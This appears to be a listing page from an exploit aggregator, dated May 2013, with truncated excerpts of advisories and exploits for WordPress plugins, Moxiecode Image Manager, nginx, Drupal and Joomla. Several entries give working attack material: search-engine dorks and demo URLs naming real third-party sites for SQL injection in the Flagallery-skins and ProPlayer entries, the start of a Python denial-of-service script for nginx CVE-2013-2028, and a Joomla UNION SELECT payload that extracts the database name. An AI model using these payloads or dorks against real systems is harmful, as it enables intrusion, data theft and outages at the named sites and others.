Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the catalog.
http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html

Vulnerable is current version 1.4.6, older versions...
Read more »
WordPress Spider Catalog Multiple Vulnerabilities
WordPress Spider Event Calendar Multiple Vulnerabilities
22 May 2013 - Source: http://www.mondounix.com
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Spider Event Calendar is a highly configurable plugin which allows you to have multiple organized events in a calendar. This plugin is one of the best WordPress Calendars available in WordPress Directory. If you have a problem with organizing your WordPress Calendar events and displaying them in a calendar format, then Spider WordPress Calendar Plugin is the best solution.
http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html

Vulnerable...
Read more »
WordPress Flagallery-Skins SQL Injection
22 May 2013 - Source: http://www.mondounix.com
##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection #
# Exploit Author : Ashiyane Digital Security Team #
# Home : www.ashiyane.org #
# Security Risk : Medium #
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist= #
# Tested on: Linux #
##############
#Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL] #
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27 #
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27 #
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27 #
#...
Read more »
Moxiecode Image Manager 3.1.5 Shell Upload
21 May 2013 - Source: http://www.mondounix.com
I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager).

This is a commercial plugin for TinyMCE. It concerns both MCImageManager and all web applications which have MCImageManager in their bundle.

These are Arbitrary File Uploading vulnerabilities, which lead to Code Execution on IIS and Apache web servers.

-------------------------
Affected products:
-------------------------

Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.

-------------------------
Affected vendors:
-------------------------

Moxiecode
http://www.moxiecode.com

----------
Details:
----------

Arbitrary File Uploading (WASC-31):

http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html

Execution...
Read more »
Nginx 1.3.9 / 1.4.0 Denial Of Service
21 May 2013 - Source: http://www.mondounix.com
# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2028)
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & Windows XP (nginx v1.4.0)
# CVE : CVE-2013-2028
import httplib
import time
import socket
import sys
import os
# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
packet = 0
def chunk(data, chunk_size):
    chunked = ""
    chunked += "%s\r\n" % (chunk_size)
    chunked += "%s\r\n" % (data)
    chunked +=...
Read more »
WordPress ProPlayer Plugin SQL Injection
21 May 2013 - Source: http://www.mondounix.com
##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection #
# Exploit Author : Ashiyane Digital Security Team #
# Plugin Link : http://wordpress.org/plugins/proplayer/ #
# Home : www.ashiyane.org #
# Security Risk : High #
# Version : 4.7.9.1 #
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id= #
# Tested on: Linux #
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL] #
#
#DEm0:
# http://www.andrewardizzoia.info/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27 #
# http://www.straightlinehdd.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27 #
# http://djmikewallace.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27 #
#...
Read more »
Drupal 6.x/7.x Google Authenticator login Access Bypass
18 May 2013 - Source: http://www.mondounix.com
Advisory ID: DRUPAL-SA-CONTRIB-2013-047
Project: Google Authenticator login (third-party module)
Version: 6.x, 7.x
Date: 2013-May-15
Security risk: Moderately critical
Exploitable from: Remote
Vulnerability: Access bypass
Description
This module will allow you to add Time-based One-time Password Algorithm (also called "Two Step Authentication" or "Multi-Factor Authentication") support to user logins. It works with Google's Authenticator app system and supports most (if not all) OATH based HOTP/TOTP systems.
Accidental removal of account configuration.
In certain scenarios, Google Authenticator login incorrectly determines the user's account name. The...
Read more »
Drupal CMS 7.12 Multiple Vulnerabilities
18 May 2013 - Source: http://www.mondounix.com
# Exploit Title : Drupal CMS 7.12 (latest stable release) Multiple Vulnerabilities
# Date : 02-03-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://ftp.drupal.org/files/projects/drupal-7.12.zip
# Vendor site : http://drupal.org
# Version : 7.12 (and lower)
# Tested on : Debian Squeeze (6.0)
# Original Advisory: http://ivanobinetti.blogspot.com/2012/03/drupal-cms-712-latest-stable-release.html
# EDB-ID : 18564 (http://www.exploit-db.com/exploits/18564/)
# Other Advisory : http://packetstormsecurity.org/files/110404/Drupal-CMS-7.12-Cross-Site-Request-Forgery.html
# Other Advisory : http://www.1337day.com/exploits/17611
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Multiple...
Read more »
Joomla Discussions SQL Injection
17 May 2013 - Source: http://www.mondounix.com
# Title : Joomla Discussions Component (com_discussions) SQL Injection Vulnerability
# Author : Red Security TEAM
# Date : 17/01/2012
# Risk : High
# Software : http://extensions.joomla.org/extensions/communication/forum/13560
# Tested On : CentOS
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=[SQLi]
#
# Example :
#
# 1. [Get Database Name]
# http://server/index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=1' union all select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)--+a
# 2. [Get Tables Name]
#...
Read more »


